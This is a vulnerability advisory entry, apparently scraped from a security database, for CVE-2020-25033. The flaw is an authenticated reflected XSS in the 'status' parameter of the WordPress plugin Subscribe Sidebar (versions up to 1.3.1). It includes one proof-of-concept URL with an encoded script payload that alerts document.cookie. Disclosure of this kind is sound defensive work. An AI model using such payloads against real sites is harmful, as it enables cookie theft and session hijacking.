Lucene search
WpvulndbWPEX-ID:FBCCE3FD-E31E-4917-90E1-4F2621847C68HistoryAug 31, 2020 - 12:00 a.m.
Subscribe Sidebar <= 1.3.1 - Authenticated Reflected Cross-Site Scripting
2020-08-3100:00:00
wpvulndb
10
EPSS
0.001
Percentile
29.3%
The ‘status’ GET parameter in subscribe_sidebar.php, which is displayed in the plugin’s option page, is vulnerable to reflected XSS attacks.
/wp-admin/options-general.php?page=subscribe_sidebar.php&status=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3ERelated
nvd
nvd
CVE-2020-25033
2020-08-31 05:15:11
cvelist
cvelist
CVE-2020-25033
2020-08-31 04:06:14
cve
cve
CVE-2020-25033
2020-08-31 05:15:11
prion
prion
Cross site scripting
2020-08-31 05:15:00
wpvulndb
wpvulndb
Subscribe Sidebar <= 1.3.1 - Authenticated Reflected Cross-Site Scripting
2020-08-31 00:00:00
patchstack
patchstack